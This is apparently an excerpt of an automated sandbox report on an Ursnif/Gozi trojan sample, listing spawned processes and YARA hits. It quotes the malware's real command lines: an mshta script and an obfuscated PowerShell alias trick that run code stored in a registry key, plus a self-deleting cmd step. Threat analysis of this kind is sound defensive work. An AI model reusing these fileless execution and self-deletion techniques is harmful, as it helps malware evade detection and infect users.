      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      Reputation:high

      Target ID:16
      Start time:10:57:12
      Start date:23/11/2022
      Path:C:\Windows\System32\mshta.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qnma='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qnma).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
      Imagebase:0x7ff622ad0000
      File size:14848 bytes
      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:17
      Start time:10:57:14
      Start date:23/11/2022
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
      Imagebase:0x7ff6f4710000
      File size:447488 bytes
      MD5 hash:95000560239032BC68B4C2FDFCDEF913
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      Reputation:high

      Target ID:18
      Start time:10:57:14
      Start date:23/11/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6edaf0000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:19
      Start time:10:57:21
      Start date:23/11/2022
      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
      Imagebase:0x7ff651010000
      File size:2739304 bytes
      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:.Net C# or VB.NET

      Target ID:20
      Start time:10:57:22
      Start date:23/11/2022
      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP"
      Imagebase:0x7ff79a6c0000
      File size:47280 bytes
      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language

      Target ID:21
      Start time:10:57:24
      Start date:23/11/2022
      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
      Imagebase:0x7ff651010000
      File size:2739304 bytes
      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:.Net C# or VB.NET

      Target ID:22
      Start time:10:57:25
      Start date:23/11/2022
      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP"
      Imagebase:0x7ff79a6c0000
      File size:47280 bytes
      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language

      Target ID:23
      Start time:10:57:32
      Start date:23/11/2022
      Path:C:\Windows\explorer.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\Explorer.EXE
      Imagebase:0x7ff75ed40000
      File size:3933184 bytes
      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language

      Target ID:24
      Start time:10:57:33
      Start date:23/11/2022
      Path:C:\Windows\System32\control.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\control.exe -h
      Imagebase:0x7ff7b4f90000
      File size:117760 bytes
      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

      Target ID:25
      Start time:10:57:59
      Start date:23/11/2022
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
      Imagebase:0x7ff7651b0000
      File size:273920 bytes
      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language

      Target ID:26
      Start time:10:57:59
      Start date:23/11/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff60f050000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language

      Target ID:27
      Start time:10:57:59
      Start date:23/11/2022
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:ping localhost -n 5
      Imagebase:0x7ff773ed0000
      File size:21504 bytes
      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language

      Target ID:28
      Start time:10:58:04
      Start date:23/11/2022
      Path:C:\Windows\System32\RuntimeBroker.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
      Imagebase:0x7ff72dbc0000
      File size:99272 bytes
      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language

      Target ID:29
      Start time:10:58:35
      Start date:23/11/2022
      Path:C:\Windows\System32\rundll32.exe
      Wow64 process (32bit):
      Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
      Imagebase:
      File size:69632 bytes
      MD5 hash:73C519F050C20580F8A62C849D49215A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      No disassembly